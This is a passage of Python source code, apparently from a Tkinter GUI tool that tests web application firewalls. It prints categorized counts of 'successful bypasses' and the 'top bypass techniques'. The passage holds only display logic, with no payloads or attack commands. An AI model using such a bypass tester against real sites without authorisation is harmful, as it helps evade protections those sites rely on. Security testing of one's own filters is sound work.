            # Category header
            percentage = (len(tokens) / len(allowed_tokens)) * 100
            self.analysis_text.insert('end', f"\n{'='*60}\n", 'separator')
            self.analysis_text.insert('end', f"{category} ({len(tokens)} tokens - {percentage:.1f}%)\n", 'category')
            self.analysis_text.insert('end', f"{'='*60}\n\n", 'separator')
            
            # List tokens
            for j, token in enumerate(tokens[:10], 1):  # Show max 10 per category
                self.analysis_text.insert('end', f"  {j:2d}. {token}\n", 'token')
            
            if len(tokens) > 10:
                self.analysis_text.insert('end', f"\n  ... and {len(tokens) - 10} more\n", 'more')
        
        # Summary statistics
        self.analysis_text.insert('end', f"\n\n{'='*60}\n", 'separator')
        self.analysis_text.insert('end', "📊 SUMMARY STATISTICS\n", 'stats')
        self.analysis_text.insert('end', f"{'='*60}\n\n", 'separator')
        
        self.analysis_text.insert('end', f"✅ Total successful bypasses: {len(allowed_tokens)}\n", 'stats')
        self.analysis_text.insert('end', f"📁 Total categories found: {len(categorized)}\n", 'stats')
        self.analysis_text.insert('end', f"🎯 Average categories per token: {sum(len(self.categorize_token(t)) for t, _, _ in allowed_tokens) / len(allowed_tokens):.1f}\n\n", 'stats')
        
        # Top techniques
        self.analysis_text.insert('end', "🏆 TOP BYPASS TECHNIQUES:\n", 'stats')
        for i, (cat, tokens) in enumerate(sorted(categorized.items(), key=lambda x: len(x[1]), reverse=True)[:5], 1):
            self.analysis_text.insert('end', f"  {i}. {cat}: {len(tokens)} tokens\n", 'top')
        
        # Configure tags
        self.analysis_text.tag_config('separator', foreground=self.colors['text_dim'])
        self.analysis_text.tag_config('category', foreground=self.colors['accent'], font=('Courier', 11, 'bold'))
        self.analysis_text.tag_config('token', foreground=self.colors['text'])
        self.analysis_text.tag_config('more', foreground=self.colors['text_dim'], font=('Courier', 9, 'italic'))
        self.analysis_text.tag_config('stats', foreground=self.colors['accent3'], font=('Courier', 10, 'bold'))
        self.analysis_text.tag_config('top', foreground=self.colors['warning'])

if __name__ == '__main__':
    app = FuturisticWafTester()
    app.mainloop()